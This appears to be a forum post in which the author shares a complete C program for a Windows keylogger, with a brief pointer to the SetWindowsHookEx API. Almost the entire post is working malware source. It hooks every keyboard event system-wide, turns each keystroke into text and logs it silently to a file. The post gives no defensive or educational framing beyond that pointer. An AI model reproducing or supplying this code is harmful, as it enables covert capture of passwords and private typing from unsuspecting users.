Here is a simple keylogger I wrote a while ago:
#include <windows.h>
#define LOG_PATH "log.txt"
HANDLE hFile;
HHOOK hHook;
LRESULT CALLBACK MessageProc(int nCode, WPARAM wParam, LPARAM lParam);
INT WINAPI WinMain(HINSTANCE hInstance, HINSTANCE HHGG, LPSTR lpCmdLine, int nShowCmd)
{
LPTSTR lpFileName = TEXT(LOG_PATH);
hFile = CreateFile(lpFileName, GENERIC_WRITE | GENERIC_READ, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if(hFile == INVALID_HANDLE_VALUE)
return(1);
hHook = SetWindowsHookEx(WH_KEYBOARD_LL, MessageProc, NULL, 0);
if(hHook == NULL)
return(2);
while( GetMessage(NULL, NULL, 0, 0) > 0 );
return(0);
}
LRESULT CALLBACK MessageProc(int nCode, WPARAM wParam, LPARAM lParam)
{
KBDLLHOOKSTRUCT kbdllhookstruct;
BYTE keyState[256];
TCHAR buff[256] = {0};
HWND hWnd;
DWORD dwThreadId;
HKL hKl;
DWORD lpNumberOfBytesWritten;
if(LOWORD(wParam) != WM_KEYDOWN)
return CallNextHookEx(hHook, nCode, wParam, lParam);
kbdllhookstruct = *((KBDLLHOOKSTRUCT *) lParam);
GetKeyboardState(&keyState[0]);
keyState[VK_SHIFT] = (BYTE) GetKeyState(VK_SHIFT);
keyState[VK_CAPITAL] = (BYTE) GetKeyState(VK_CAPITAL);
keyState[VK_CONTROL] = (BYTE) GetKeyState(VK_CONTROL);
hWnd = GetForegroundWindow();
if(hWnd == NULL)
ExitProcess(3);
dwThreadId = GetWindowThreadProcessId(hWnd, 0);
hKl = GetKeyboardLayout(dwThreadId);
ToUnicodeEx(kbdllhookstruct.vkCode, kbdllhookstruct.scanCode, &keyState[0], &buff[0], 256, 0, hKl);
WriteFile(hFile, &buff[0], sizeof(TCHAR) * lstrlen(&buff[0]), &lpNumberOfBytesWritten, NULL);
return CallNextHookEx(hHook, nCode, wParam, lParam);
}
In order to understand it, start with
SetWindowsHookEx
[
^]